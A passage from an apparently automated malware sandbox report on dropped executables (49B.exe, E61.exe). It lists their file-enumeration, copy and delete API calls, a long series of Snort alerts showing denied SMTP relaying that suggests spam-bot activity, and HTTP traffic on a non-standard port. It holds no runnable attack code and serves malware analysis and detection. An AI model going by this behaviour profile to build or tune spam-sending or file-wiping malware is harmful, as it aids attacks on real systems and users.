Source: C:\Users\user\AppData\Local\Temp\49B.exe	Code function: 22_2_0043E07C FindClose,FindFirstFileExW,GetLastError,FindFirstFileExW,GetLastError,	22_2_0043E07C
Source: C:\Users\user\AppData\Local\Temp\49B.exe	Code function: 22_2_0045EACD FindFirstFileExW,	22_2_0045EACD
Source: C:\Users\user\AppData\Local\Temp\E61.exe	Code function: 25_2_0040A24D __EH_prolog3,_sprintf,FindFirstFileA,_sprintf,_sprintf,_sprintf,PathMatchSpecA,CopyFileA,FindNextFileA,FindClose,	25_2_0040A24D
Source: C:\Users\user\AppData\Local\Temp\E61.exe	Code function: 25_2_004625F7 __EH_prolog3_GS,FindFirstFileW,FindNextFileW,	25_2_004625F7
Source: C:\Users\user\AppData\Local\Temp\E61.exe	Code function: 25_2_00412D96 _sprintf,FindFirstFileA,_sprintf,FindNextFileA,FindClose,	25_2_00412D96
Source: C:\Users\user\AppData\Local\Temp\E61.exe	Code function: 25_2_00404F13 __EH_prolog3,_memset,_memset,_memset,_memset,lstrcpyW,lstrcatW,FindFirstFileW,lstrcpyW,lstrcatW,lstrcatW,lstrcpyW,lstrcatW,lstrcatW,lstrcatW,lstrcmpW,lstrcmpW,lstrcmpW,PathMatchSpecW,DeleteFileW,PathMatchSpecW,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,FindNextFileW,FindClose,_memset,_memset,_memset,_memset,_memset,_memset,_memset,_memset,FindClose,	25_2_00404F13
Source: C:\Users\user\AppData\Local\Temp\E61.exe	Code function: 25_2_00405A45 __EH_prolog3,_sprintf,FindFirstFileA,_sprintf,FindNextFileA,FindClose,	25_2_00405A45

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.58.161:25 -> 192.168.2.5:49734
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.57.161:25 -> 192.168.2.5:49735
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.74.33:25 -> 192.168.2.5:49745
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.74.33:25 -> 192.168.2.5:49746
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.57.161:25 -> 192.168.2.5:49747
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.57.161:25 -> 192.168.2.5:49748
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.57.161:25 -> 192.168.2.5:49750
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.66.33:25 -> 192.168.2.5:49751
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.18.161:25 -> 192.168.2.5:49752
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.57.161:25 -> 192.168.2.5:49754
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.57.161:25 -> 192.168.2.5:49753
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.74.33:25 -> 192.168.2.5:49757
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.57.161:25 -> 192.168.2.5:49756
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.74.33:25 -> 192.168.2.5:49759
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.74.33:25 -> 192.168.2.5:49760
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.74.33:25 -> 192.168.2.5:49763
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.74.33:25 -> 192.168.2.5:49764
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.56.161:25 -> 192.168.2.5:49768
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.56.161:25 -> 192.168.2.5:49767
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.57.161:25 -> 192.168.2.5:49771
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.57.161:25 -> 192.168.2.5:49770
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.57.161:25 -> 192.168.2.5:49774
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.57.161:25 -> 192.168.2.5:49775
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.18.161:25 -> 192.168.2.5:49778
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.18.161:25 -> 192.168.2.5:49779
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.57.161:25 -> 192.168.2.5:49777
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.57.161:25 -> 192.168.2.5:49782
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.57.161:25 -> 192.168.2.5:49781
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.57.161:25 -> 192.168.2.5:49783
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.57.161:25 -> 192.168.2.5:49784
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.57.161:25 -> 192.168.2.5:49786
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.57.161:25 -> 192.168.2.5:49788
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.57.161:25 -> 192.168.2.5:49790
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.57.161:25 -> 192.168.2.5:49789
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.57.161:25 -> 192.168.2.5:49792
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.57.161:25 -> 192.168.2.5:49791
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.18.225:25 -> 192.168.2.5:49796
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.74.33:25 -> 192.168.2.5:49793
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.18.97:25 -> 192.168.2.5:49799
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.18.97:25 -> 192.168.2.5:49800
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.74.33:25 -> 192.168.2.5:49798
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.18.97:25 -> 192.168.2.5:49801
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.74.33:25 -> 192.168.2.5:49802
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.74.33:25 -> 192.168.2.5:49803
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.74.33:25 -> 192.168.2.5:49804
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.74.33:25 -> 192.168.2.5:49806
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.74.33:25 -> 192.168.2.5:49808
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.74.33:25 -> 192.168.2.5:49809
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.18.225:25 -> 192.168.2.5:49811
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.18.225:25 -> 192.168.2.5:49812
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.74.33:25 -> 192.168.2.5:49814
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.74.33:25 -> 192.168.2.5:49813
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.13.33:25 -> 192.168.2.5:49815
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.13.33:25 -> 192.168.2.5:49816
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.18.225:25 -> 192.168.2.5:49820
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.9.33:25 -> 192.168.2.5:49819
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.74.33:25 -> 192.168.2.5:49822
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.74.33:25 -> 192.168.2.5:49821
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.74.33:25 -> 192.168.2.5:49825
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.74.33:25 -> 192.168.2.5:49824
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.74.33:25 -> 192.168.2.5:49827
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.74.33:25 -> 192.168.2.5:49826
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.18.225:25 -> 192.168.2.5:49828
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.59.161:25 -> 192.168.2.5:49829
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.74.33:25 -> 192.168.2.5:49830
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.18.225:25 -> 192.168.2.5:49834
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.18.225:25 -> 192.168.2.5:49835
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.18.225:25 -> 192.168.2.5:49836
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.74.33:25 -> 192.168.2.5:49837
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.74.33:25 -> 192.168.2.5:49838
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.14.33:25 -> 192.168.2.5:49842
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.13.33:25 -> 192.168.2.5:49843
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.74.33:25 -> 192.168.2.5:49841
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.74.33:25 -> 192.168.2.5:49844
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.74.33:25 -> 192.168.2.5:49845
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.18.97:25 -> 192.168.2.5:49847
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.74.33:25 -> 192.168.2.5:49846
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.74.33:25 -> 192.168.2.5:49848
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.18.225:25 -> 192.168.2.5:49850
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.74.33:25 -> 192.168.2.5:49849
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.14.33:25 -> 192.168.2.5:49851
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.10.33:25 -> 192.168.2.5:49852
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.10.33:25 -> 192.168.2.5:49853
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.10.33:25 -> 192.168.2.5:49856
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.74.33:25 -> 192.168.2.5:49857
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.10.33:25 -> 192.168.2.5:49859
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.14.33:25 -> 192.168.2.5:49863
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.10.33:25 -> 192.168.2.5:49864
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.74.33:25 -> 192.168.2.5:49862
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.10.33:25 -> 192.168.2.5:49866
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.12.33:25 -> 192.168.2.5:49868
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.73.33:25 -> 192.168.2.5:49867
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.18.225:25 -> 192.168.2.5:49869
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.18.225:25 -> 192.168.2.5:49870
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.18.225:25 -> 192.168.2.5:49871
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.18.97:25 -> 192.168.2.5:49872
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.18.225:25 -> 192.168.2.5:49873
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.18.225:25 -> 192.168.2.5:49874
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.18.225:25 -> 192.168.2.5:49875
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.12.33:25 -> 192.168.2.5:49876
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.9.33:25 -> 192.168.2.5:49877
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.18.225:25 -> 192.168.2.5:49878
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.18.225:25 -> 192.168.2.5:49879
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.18.225:25 -> 192.168.2.5:49881
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.18.225:25 -> 192.168.2.5:49880
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.18.225:25 -> 192.168.2.5:49883
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.18.225:25 -> 192.168.2.5:49884
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.18.225:25 -> 192.168.2.5:49885
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.18.225:25 -> 192.168.2.5:49886
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.12.33:25 -> 192.168.2.5:49889
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.12.33:25 -> 192.168.2.5:49890
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.18.97:25 -> 192.168.2.5:49893
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.18.97:25 -> 192.168.2.5:49894
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.18.225:25 -> 192.168.2.5:49895
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.18.225:25 -> 192.168.2.5:49896
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.18.225:25 -> 192.168.2.5:49897
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.4.33:25 -> 192.168.2.5:49898
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.14.33:25 -> 192.168.2.5:49900
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.18.225:25 -> 192.168.2.5:49902
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.12.33:25 -> 192.168.2.5:49903
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.73.33:25 -> 192.168.2.5:49899
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.18.225:25 -> 192.168.2.5:49905
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.18.225:25 -> 192.168.2.5:49906
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.51.33:25 -> 192.168.2.5:49904
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.18.225:25 -> 192.168.2.5:49907
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.18.225:25 -> 192.168.2.5:49908
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.12.33:25 -> 192.168.2.5:49909
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.18.225:25 -> 192.168.2.5:49911
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.18.225:25 -> 192.168.2.5:49912
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.18.225:25 -> 192.168.2.5:49913
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.18.97:25 -> 192.168.2.5:49914
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.18.225:25 -> 192.168.2.5:49916
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.18.225:25 -> 192.168.2.5:49915
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.18.225:25 -> 192.168.2.5:49918
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.18.225:25 -> 192.168.2.5:49917
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.18.225:25 -> 192.168.2.5:49920
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.18.225:25 -> 192.168.2.5:49921
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.18.225:25 -> 192.168.2.5:49922
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.14.33:25 -> 192.168.2.5:49923
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.18.225:25 -> 192.168.2.5:49925
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.18.225:25 -> 192.168.2.5:49926
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.59.161:25 -> 192.168.2.5:49924
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.12.33:25 -> 192.168.2.5:49927
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.12.33:25 -> 192.168.2.5:49928
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.10.33:25 -> 192.168.2.5:49930
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.18.225:25 -> 192.168.2.5:49931
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.14.33:25 -> 192.168.2.5:49934
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.12.33:25 -> 192.168.2.5:49933
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.18.225:25 -> 192.168.2.5:49936
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.12.33:25 -> 192.168.2.5:49937
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.18.225:25 -> 192.168.2.5:49939
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.18.225:25 -> 192.168.2.5:49938
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.14.33:25 -> 192.168.2.5:49941
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.18.225:25 -> 192.168.2.5:49943
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.18.225:25 -> 192.168.2.5:49946
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.18.225:25 -> 192.168.2.5:49947
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.14.33:25 -> 192.168.2.5:49948
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.12.33:25 -> 192.168.2.5:49950
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.18.225:25 -> 192.168.2.5:49951
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.22.161:25 -> 192.168.2.5:49952
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.10.33:25 -> 192.168.2.5:49953
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.10.33:25 -> 192.168.2.5:49954
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.14.33:25 -> 192.168.2.5:49955
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.18.97:25 -> 192.168.2.5:49956
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.18.225:25 -> 192.168.2.5:49957
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.18.225:25 -> 192.168.2.5:49958
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.14.33:25 -> 192.168.2.5:49959
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.12.33:25 -> 192.168.2.5:49960
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.18.225:25 -> 192.168.2.5:49961
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.12.33:25 -> 192.168.2.5:49963
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.12.33:25 -> 192.168.2.5:49962
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.18.225:25 -> 192.168.2.5:49967
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.14.33:25 -> 192.168.2.5:49966
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.14.33:25 -> 192.168.2.5:49971
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.12.33:25 -> 192.168.2.5:49969
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.12.33:25 -> 192.168.2.5:49974
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.14.33:25 -> 192.168.2.5:49977
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.18.225:25 -> 192.168.2.5:49980
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.18.225:25 -> 192.168.2.5:49979
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.12.33:25 -> 192.168.2.5:49983
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.12.33:25 -> 192.168.2.5:49984
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.18.97:25 -> 192.168.2.5:49985
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.18.97:25 -> 192.168.2.5:49986
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.18.225:25 -> 192.168.2.5:49988
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.18.225:25 -> 192.168.2.5:49989
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.18.225:25 -> 192.168.2.5:49990
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.18.225:25 -> 192.168.2.5:49991
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.18.225:25 -> 192.168.2.5:49993
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.18.225:25 -> 192.168.2.5:49992
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.18.97:25 -> 192.168.2.5:49995
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.18.97:25 -> 192.168.2.5:49997
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.18.225:25 -> 192.168.2.5:49998
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.56.161:25 -> 192.168.2.5:49996
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.22.161:25 -> 192.168.2.5:50000
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 125.209.222.14:25 -> 192.168.2.5:49976
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.18.225:25 -> 192.168.2.5:50001
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.18.225:25 -> 192.168.2.5:50004
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.12.33:25 -> 192.168.2.5:50003
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.73.161:25 -> 192.168.2.5:50005
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.73.161:25 -> 192.168.2.5:50006
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.12.33:25 -> 192.168.2.5:50011
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.22.161:25 -> 192.168.2.5:50010
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.12.33:25 -> 192.168.2.5:50014
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.12.33:25 -> 192.168.2.5:50013
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.4.33:25 -> 192.168.2.5:50020
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.12.33:25 -> 192.168.2.5:50021
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.73.161:25 -> 192.168.2.5:50025
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.73.161:25 -> 192.168.2.5:50026
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.12.33:25 -> 192.168.2.5:50032
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.12.33:25 -> 192.168.2.5:50033
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.12.33:25 -> 192.168.2.5:50034
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.22.161:25 -> 192.168.2.5:50035
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.12.33:25 -> 192.168.2.5:50036
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.12.33:25 -> 192.168.2.5:50037
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.12.33:25 -> 192.168.2.5:50038
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.22.161:25 -> 192.168.2.5:50039
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.12.33:25 -> 192.168.2.5:50041
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.12.33:25 -> 192.168.2.5:50040
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.73.161:25 -> 192.168.2.5:50044
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.73.161:25 -> 192.168.2.5:50043
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.12.33:25 -> 192.168.2.5:50052
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.12.33:25 -> 192.168.2.5:50051
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.12.33:25 -> 192.168.2.5:50056
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.12.33:25 -> 192.168.2.5:50055
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.18.97:25 -> 192.168.2.5:50058
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.18.97:25 -> 192.168.2.5:50059
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.12.33:25 -> 192.168.2.5:50060
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.73.161:25 -> 192.168.2.5:50057
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.18.225:25 -> 192.168.2.5:50064
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.12.33:25 -> 192.168.2.5:50062
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.12.33:25 -> 192.168.2.5:50066
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.12.33:25 -> 192.168.2.5:50065
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.73.33:25 -> 192.168.2.5:50071
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.56.161:25 -> 192.168.2.5:50072
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.12.33:25 -> 192.168.2.5:50084
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.12.33:25 -> 192.168.2.5:50086
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.73.161:25 -> 192.168.2.5:50081
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.12.33:25 -> 192.168.2.5:50089
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.18.97:25 -> 192.168.2.5:50090
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.56.161:25 -> 192.168.2.5:50088
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.12.33:25 -> 192.168.2.5:50091
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.18.97:25 -> 192.168.2.5:50092
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.12.33:25 -> 192.168.2.5:50093
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.12.33:25 -> 192.168.2.5:50095
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.73.161:25 -> 192.168.2.5:50097
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.73.161:25 -> 192.168.2.5:50096
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.12.33:25 -> 192.168.2.5:50103
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.12.33:25 -> 192.168.2.5:50104
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.73.161:25 -> 192.168.2.5:50108
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.73.161:25 -> 192.168.2.5:50107
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.18.161:25 -> 192.168.2.5:50115

Uses known network protocols on non-standard ports

Show sources

Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 2080
